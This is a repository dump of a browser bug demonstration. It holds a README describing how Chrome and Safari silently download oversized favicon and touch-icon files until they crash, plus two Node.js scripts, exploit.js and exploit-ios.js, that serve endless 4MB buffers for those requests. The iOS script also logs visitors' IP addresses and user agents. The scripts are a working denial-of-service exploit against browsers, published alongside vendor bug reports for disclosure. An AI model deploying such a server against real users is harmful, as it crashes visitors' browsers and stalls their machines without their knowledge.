├── README.md
├── exploit-ios.js
└── exploit.js


/README.md:
--------------------------------------------------------------------------------
 1 | # Favicon Download Bug
 2 | 
 3 | This repository demonstrates that browsers will download huge favicon and touch-icon files to the point that they crash and/or bring the computer to a halt - all in the background with no indication to the user that any form of download or networking is happening.
 4 | 
 5 | (no spinner)
 6 | 
 7 | I originally tested this with Chrome. People have pointed <strike>[Firefox](http://i.imgur.com/3zkPKD7.png)</strike> and [Safari](https://i.imgur.com/B2LeRy4.png) do this too, [IE](https://github.com/benjamingr/favicon-bug/issues/5)  does not appear to be affected.
 8 | 
 9 | [Chrome bug 500639](https://code.google.com/p/chromium/issues/detail?id=500639) <strike>[Firefox bug 1174811](https://bugzilla.mozilla.org/show_bug.cgi?id=1174811)</strike> (fixed)
10 | 
11 | This is what it looks like before crashing on my computer (currently testing on travel laptop with 4gb ram):
12 | 
13 | ![](http://i.imgur.com/J16lwjF.png)
14 | 
15 | 
16 | Inspired by [a tweet](https://twitter.com/a_de_pasquale/status/608997818913665024) by [a_de_pasquale](https://twitter.com/a_de_pasquale).
17 | 
18 | ### Running it
19 | 
20 |  1. Install [io.js](http://www.iojs.org) (NodeJS works too)
21 |  2. Run: `node exploit.js`
22 |  3. Test your browser by visiting http://localhost:3000  (or if you have `process.env.PORT` set then that port)
23 |       
24 | ### Running it for Apple Touch Icon
25 | 
26 |  1. Install [io.js](http://www.iojs.org) (NodeJS works too)
27 |  2. Run: `node exploit-ios.js`
28 |  3. Test on iOS by visiting http://ip-of-computer:3000 and tapping on the share icon (or if you have `process.env.PORT` set then that port)
29 | 


--------------------------------------------------------------------------------
/exploit-ios.js:
--------------------------------------------------------------------------------
 1 | require("http").createServer(function(req, res){
 2 | 	var ip = req.headers['x-forwarded-for'] || 
 3 | 			req.connection.remoteAddress || 
 4 | 			req.socket.remoteAddress ||
 5 | 			req.connection.socket.remoteAddress;
 6 | 	if(req.url.indexOf("favicon.ico") === -1
 7 | 		&& req.url.indexOf("touch-icon.png") === -1) return res.end("<!doctype html><html><head><link rel='apple-touch-icon' href='touch-icon-iphone.png'>Hello World</head><body></body></html>");
 8 | 	(function poc(i){
 9 | 		res.write(new Buffer(1 << 22));
10 | 		setImmediate(poc, i+1);
11 | 		console.log(ip + " - " + req.headers['user-agent'] + " - Writing Poc", i);
12 | 	}(1));
13 | }).listen(process.env.PORT || 3000);
14 | 


--------------------------------------------------------------------------------
/exploit.js:
--------------------------------------------------------------------------------
1 | require("http").createServer(function(req, res){
2 | 	if(req.url.indexOf("favicon.ico") === -1) return res.end("Hello World");
3 | 	(function poc(i){
4 | 		res.write(new Buffer(1 << 22));
5 | 		setImmediate(poc, i+1);
6 | 		console.log("Writing Poc", i);
7 | 	}(1));
8 | }).listen(process.env.PORT || 3000);


--------------------------------------------------------------------------------